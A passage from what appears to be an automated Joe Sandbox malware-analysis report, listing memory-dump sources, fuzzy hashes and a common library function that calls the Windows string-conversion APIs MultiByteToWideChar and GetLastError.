                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ByteCharMultiWide$ErrorLast
                                                                                • String ID:
                                                                                • API String ID: 1717984340-0
                                                                                • Opcode ID: 87fd12a014d32a69e1321f94067b17621f6fc27d46547f6ea495f007f72d0054
                                                                                • Instruction ID: ecac45699e256c48587d6f27f66036641a8fb520bb473c9b2adecd150689d728
                                                                                • Opcode Fuzzy Hash: 87fd12a014d32a69e1321f94067b17621f6fc27d46547f6ea495f007f72d0054
                                                                                • Instruction Fuzzy Hash: 65414871E00206AFCF258F65C854ABBFBA4EF09310F1451BAF858973A1DB38AD09C759
                                                                                Function 007BFCC5 Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00781D3F), ref: 007BFD5B
                                                                                • GetLastError.KERNEL32 ref: 007BFD69
                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 007BFDC4
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ByteCharMultiWide$ErrorLast
                                                                                • String ID:
                                                                                • API String ID: 1717984340-0
                                                                                • Opcode ID: 51d5f03fba1b172d5651f1593246994e43d26d1415dc77cb91aa80c4233d165d
                                                                                • Instruction ID: 55d67d53b4a4b998c41ae0566958dffba850cc6f97c1ddccddb5e840fae765ba
                                                                                • Opcode Fuzzy Hash: 51d5f03fba1b172d5651f1593246994e43d26d1415dc77cb91aa80c4233d165d
                                                                                • Instruction Fuzzy Hash: 4D41D231604206AFCB259F64DC48BFA7BA5EF01B20F1441BDF8599B2A2EB38DD01C760